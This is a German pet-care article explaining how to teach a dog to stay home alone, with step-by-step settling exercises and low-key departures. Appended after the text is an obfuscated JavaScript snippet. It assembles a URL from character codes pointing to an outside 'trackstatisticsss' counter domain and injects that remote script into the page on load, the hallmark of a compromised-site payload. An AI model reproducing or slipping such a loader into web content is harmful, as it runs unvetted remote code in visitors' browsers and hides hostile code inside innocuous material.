Das Alleinsein lernen

Es ist sehr hilfreich, wenn Ihr Hund einige Stunden ohne Sie auskommt und alleine zu Hause bleiben kann. In dieser Zeit sollte er sich entspannen können und einfach Nichtstun.

Vom ersten Tag an, sollte er einen festen Platz zugewiesen bekommen. Das sollte allerdings auch ein Platz sein, wo er zur Ruhe kommen kann.

Der richtige Platz für das Körbchen:

Das Körbchen sollte nicht im Durchgangsverkehr (Flur) oder gar im Kinderzimmer stehen. Im Wohnzimmer in einer ruhigen Ecke kann er sich am besten entspannen und zur Ruhe kommen.

Warum das Ganze?

Hat Ihr Hund einmal verstanden, dass er einen Rückzugsort hat, wo er Ruhe findet, wird er diesen Platz ganz von selbst aufsuchen, wenn ihm der Trubel einmal zu groß ist.

Genauso wichtig ist es aber auch, Ihrem Hund beizubringen, dass er Ihnen in der Wohnung nicht ständig hinterher läuft. So kann er nicht zur Ruhe kommen und lernt auch nicht für eine Weile mal alleine zu bleiben.

Aber wie bringt man dem Hund bei, auf genau diesen Platz zu gehen und dort auch zu bleiben?

Am Anfang hilft es, Ihren Hund dort mit der Leine hinzuführen. Ist er auf seinem Platz, sollten sie bei ihm seitlich stehen bleiben, ihn nicht anschauen und warten. Wichtig ist, geben Sie Ihrem Hund keine Aufgabe, wie Sitz oder Platz.

Wenn Ihr Hund sich hingelegt, lassen Sie die Leine los und gehen, ohne ihn anzuschauen, einfach weg (bleiben aber im selben Raum). Sollte er aufstehen, bringen Sie ihn ohne etwas zu sagen wieder zurück auf seinen Platz und fangen noch einmal von vorne an. Meist dauert diese Übung nur 5 bis 10 Minuten, bis Ihr Hund verstanden hat, dass er einfach nur auf seinem Platz bleiben soll und keine Aufgabe hat.

Hat das funktioniert, können Sie den nächsten Schritt machen. Verlassen Sie für kurze Zeit das Zimmer, gehen Sie ins Bad, Küche und andere Zimmer. Wenn er dann immer noch in seinem Körbchen liegt, können Sie den nächsten Schritt machen. Jetzt verlängern Sie nach und nach die Zeit, in der Sie sich in einem anderen Raum aufhalten als Ihr Hund.

Das Verlassen der Wohnung:

Verlassen Sie die Wohnung für kurze Zeit. Hierbei ist es wichtig, kein großes Tara daraus zu machen.

Ein kurzer Satz wie „Ich komme gleich wieder“ in normaler Tonlage reicht.

Aber auch wenn Sie wiederkommen, sollten Sie keine große Geschichte daraus machen.

Ihr vierbeiniger Mitbewohner wird lernen, dass es etwas ganz Normales ist, auch mal alleine Zuhause zu bleiben.

Er wird Ihnen vertrauen und genau wissen, dass Sie auch wieder zurückkommen.

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}